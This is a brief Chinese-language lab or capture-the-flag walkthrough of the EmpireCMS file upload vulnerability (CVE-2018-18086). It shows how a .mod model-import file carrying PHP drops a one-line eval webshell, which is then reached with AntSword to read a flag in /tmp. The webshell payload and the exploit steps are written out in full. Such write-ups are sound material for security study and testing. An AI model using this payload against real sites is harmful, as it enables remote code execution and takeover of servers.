empirecms 文件上传漏洞 (CVE-2018-18086)
·
empirecms 文件上传漏洞 (CVE-2018-18086)

- 访问ip(10.9.47.6:38301)

- 访问后台(10.9.47.6:38301/empirecms/e/admin/),并登录后台

- 点击系统——数据表与系统模型——导入系统模型

- 在桌面新建php文件,把后缀名修改为mod,写入这句话
- <?php file_put_contents("webshell.php","<?php @eval(\$_POST[cmd]); ?>");?>)

- 上传之后点击马上导入,并导入成功


- 访问网页,发现空白,说明添加成功

- 用蚁剑连接,添加成功

- 在虚拟终端输入dir /tmp 查看flag

更多推荐
所有评论(0)